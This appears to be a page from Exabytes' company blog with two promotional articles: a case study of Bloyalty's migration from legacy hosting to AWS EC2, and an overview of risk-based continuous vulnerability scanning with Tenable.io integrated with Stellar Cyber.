From Legacy Hosting to AWS: Bloyalty's Tips and Learnings

BLoyalty Sdn Bhd, a wholly-owned subsidiary of Berjaya Corporation Berhad, owns and manages a Bloyalty loyalty program known as B Infinite (Formerly BCard). Aimed at promoting Bloyalty loyalty, B Infinite is Malaysia’s lifestyle and brand-focused reward program, partnering with merchants from various industries and businesses to offer their members an unparalleled value for their lifestyle choices.

What is B Infinite?

BCard was launched to the public in Klang Valley on 15 December 2010 and subsequently nationwide on 30 September 2011. In July 2016, BCard was officially rebranded as B Infinite. Today, B Infinite (Formerly BCard) has a network of more than 130 merchant partners, over 4,000 stores nationwide.

Known to be the “Card that Keeps On Giving,” B Infinite constantly propose a win-win situation for both Bloyalty and businesses. In this spirit of innovation, B Infinite creates a world of diverse choices using the fast-paces and near limitless digital and mobile platform. The possibilities are now infinite.

B Infinite’s Digital Transformation Journey

Bloyalty initiated a digital transformation journey due to challenges in accessing their previous IT environment, which had become outdated, costly to maintain, and lacked visibility. Their legacy infrastructure — hosted on-premises and partially managed by a third-party provider — was no longer scalable or reliable, and they faced frequent delays in accessing critical systems and data.

Recognising the need for better agility and long-term cost savings, Bloyalty made the strategic decision to migrate to AWS. By leveraging AWS’s scalable cloud services, the organisation aimed to: – Regain control over their IT environment – Optimise operational costs by eliminating hardware dependencies and reducing licensing and maintenance expenses – Modernise their workloads, enabling faster deployment and easier management – Enhance resilience and accessibility, ensuring systems are reliably available from anywhere

Migration Approach: From Legacy Hosting to AWS

When planning a cloud migration, one of the most effective strategies to minimise disruption and accelerate time-to-value is the lift-and-shift approach. For Bloyalty, Exabytes recommended migrating their workloads from their previous hosting environment to Amazon Web Services (AWS) using two proven migration tools: AWS MGN (Application Migration Service) and RiverMeadow. These tools enabled a seamless transition of their applications and data into the AWS cloud while ensuring business continuity throughout the migration process.

By leveraging these migration tools, Bloyalty’s workloads were successfully transitioned into Amazon Elastic Compute Cloud (EC2). The newly built AWS environment was carefully designed to deliver high availability and scalability, ensuring that Bloyalty could easily adjust resources based on demand. Beyond just performance, the move to AWS also allowed them to achieve a more cost-effective operating model—reducing unnecessary overheads while still meeting, and in some cases exceeding, their original performance benchmarks.

Why Amazon EC2 is the Right Choice

One of the key reasons behind the success of this migration was the use of Amazon EC2, AWS’s highly flexible compute service. EC2 provides a wide range of instance types, sizes, and pricing options, giving businesses the freedom to right-size resources for each specific workload. Whether running high-performance databases, web applications, or background processing tasks, EC2 offers the right configuration to balance performance and cost.

In addition, EC2’s auto-scaling capabilities allow applications to automatically adjust to traffic patterns—scaling up during peak demand and scaling down during quieter periods. This not only improves system responsiveness but also optimises costs by ensuring Bloyalty only pays for what they use. The service is further enhanced by integrations with other AWS services such as Amazon S3 for storage, Amazon RDS for managed databases, and Amazon CloudWatch for monitoring, creating a holistic and future-ready infrastructure.

From a business perspective, EC2 also offers the flexibility of pricing models—including On-Demand, Reserved Instances, and Spot Instances—giving Bloyalty the ability to optimise their spend according to usage patterns. For organisations that prioritise resiliency and continuity, EC2 instances can be deployed across multiple Availability Zones (AZs), ensuring workloads remain operational even if one AZ experiences an outage.

Driving Business Value with AWS

The migration to AWS EC2 ultimately enabled Bloyalty to modernise their IT environment without having to re-architect applications immediately. This approach gave them the flexibility and stabilizer operations in the cloud first, while opening the door to future innovations such as containerisation, serverless computing, and advanced data analytics. By moving to EC2, they now benefit from a platform that is reliable, secure, scalable, and cost-efficient, positioning them strongly for both current and future business needs.

The Value of an AWS Partner

A successful migration is not just about moving workloads from one environment to another—it’s about ensuring that the new cloud environment is built to support long-term business goals. This is where the expertise of an AWS Partner brings tremendous value. As a trusted advisor, Exabytes guided Bloyalty through the entire migration process, from initial assessment and planning, to the actual lift-and-shift execution, and finally to post-migration optimisation.

Exabytes ensured that the AWS environment was designed following best practices in performance, security, and cost management, providing Bloyalty with a resilient, future-ready foundation. Beyond the technical execution, Exabytes also helped the Bloyalty navigate migration tools like AWS MGN and RiverMeadow, ensuring the right approach was used for each workload. Post-migration, Exabytes provided knowledge transfer and enablement, empowering Bloyalty’s team to operate confidently within AWS.

By working with Exabytes, the Bloyalty didn’t just achieve a smooth transition to EC2—they also gained a strategic advantage, with a cloud environment optimsed for scalability, cost-efficiency, and innovation. The ongoing support and guidance from Exabytes ensures that Bloyalty can continue to unlock more value from AWS services as their business evolves.

Continuous Vulnerability Scanning with Tenable.io: Going Beyond CVSS

By
Edwin Alexander
-
0

In the ever-evolving threat landscape of 2025, vulnerability management is no longer about simply detecting Common Vulnerabilities and Exposures (CVEs) and assigning CVSS scores. Organizations need continuous visibility, contextual prioritization, and intelligent response mechanisms to defend against fast-moving exploits. That’s where Tenable.io steps in — enabling not just traditional scanning, but continuous, risk-based vulnerability management (VRM).
This article explores how Tenable.io redefines vulnerability scanning beyond CVSS, its integration with platforms like Stellar Cyber, and how security teams can operationalize findings in real-time.

Why CVSS Alone Isn’t Enough

CVSS (Common Vulnerability Scoring System) has been the industry standard for evaluating vulnerabilities. However, in practice, CVSS has key limitations:
  • It’s static: Scores don’t adapt to your specific environment.
  • Lacks exploitability context: A high CVSS score doesn’t mean active exploitation.
  • Ignores asset value: It treats all systems as equally critical.
According to Tenable (2024), over 55% of high-CVSS vulnerabilities are not exploitable in the wild, yet many organizations still prioritize them over actual threats.

What Is Continuous Vulnerability Management?

Unlike scheduled monthly scans, continuous vulnerability scanning is about real-time asset discovery and ongoing assessment. Tenable.io’s cloud-native platform:
  • Monitors assets as they are spun up or modified
  • Scans without manual triggers
  • Uses passive and active techniques to stay updated
  • Integrates with cloud environments (AWS, Azure, GCP) and containers
This eliminates visibility gaps between scan windows, making it ideal for modern hybrid environments.

Going Beyond CVSS: Tenable.io’s Risk-Based Approach

Tenable.io uses Vulnerability Priority Rating (VPR), which includes:
  • Threat intelligence: Active exploitation in the wild, malware associations
  • Asset criticality: Importance based on role and exposure
  • Temporal risk: Changes over time as threats emerge or fade
This allows SOC and GRC teams to prioritize real risks, not just theoretical ones.
For example:
  • CVSS 9.8 vulnerability with no known exploit → Low VPR
  • CVSS 7.0 vulnerability actively targeted in ransomware campaigns → High VPR

Integration with Stellar Cyber: Incident-Driven Response

By feeding Tenable.io data into Stellar Cyber’s Open XDR platform, vulnerabilities are correlated with:
  • SIEM alerts
  • EDR findings from SentinelOne
  • User and network behavior
This creates attack path visualizations, showing how an attacker might exploit a weak point and move laterally — enabling preventive actions before damage occurs.
Example workflow:
  1. Tenable.io detects outdated Apache on a web server.
  2. Stellar Cyber correlates with failed RDP login attempts from foreign IPs.
  3. An incident is generated with high confidence and risk score.
  4. SOC automatically isolates the asset or flags for immediate patching.

Benefits of Continuous VRM with Tenable.io

Feature Traditional Scanning Tenable.io (Continuous VRM)
Scan Frequency Monthly or quarterly Real-time and continuous
Prioritization CVSS-based Risk and exploit-based
Asset Coverage Static and manual Dynamic discovery
Context Awareness Low High (via integrations and threat intel)
Remediation Speed Delayed Streamlined with automation

Best Practices for Effective Use

  1. Automate asset tagging: Use CMDB and cloud tags to classify systems by criticality.
  2. Integrate with patch management tools: Auto-deploy patches based on VPR risk.
  3. Cross-correlate with SIEM: Use Stellar Cyber to add detection and behavioral context.
  4. Regularly review exemptions: Ensure justifications are still valid for unpatched assets.
  5. Use dashboards for compliance: Map vulnerabilities to ISO 27001 Annex A controls (e.g., A.12.6.1 – Technical Vulnerability Management).

Real-World Impact

A 2025 study by Gartner revealed organizations that implemented Tenable.io with risk-based prioritization reduced time-to-remediate critical vulnerabilities by 60% and improved audit readiness for ISO 27001 and NIST CSF frameworks.
At Exabytes, integrating Tenable.io with Stellar Cyber and SentinelOne has enabled:
  • Automated attack path analysis
  • Prioritized patching workflows
  • Faster incident triage by the SOC team

Final Thoughts

Relying only on CVSS scores leaves blind spots that attackers can exploit. Continuous vulnerability scanning with Tenable.io, combined with Stellar Cyber and SentinelOne, empowers security teams to prioritize threats based on real-world risk and respond before damage is done.
Don’t wait for attackers to find the gaps you didn’t know existed. Start with Exabytes eSecure to see how we can help you operationalize risk-based vulnerability management and protect what matters most.

References

  • Tenable. (2024). Vulnerability Priority Rating (VPR) Explained. https://www.tenable.com/blog
  • Stellar Cyber. (2025). Unified Security Operations with Tenable.io Integration. https://www.stellarcyber.ai
  • NIST. (2023). Cybersecurity Framework 2.0. https://www.nist.gov
  • International Organization for Standardization. (2022). ISO/IEC 27001:2022 Information Security Management Systems. https://www.iso.org
1...232425...256Page 24 of 256

Event & Activities

Event & Activities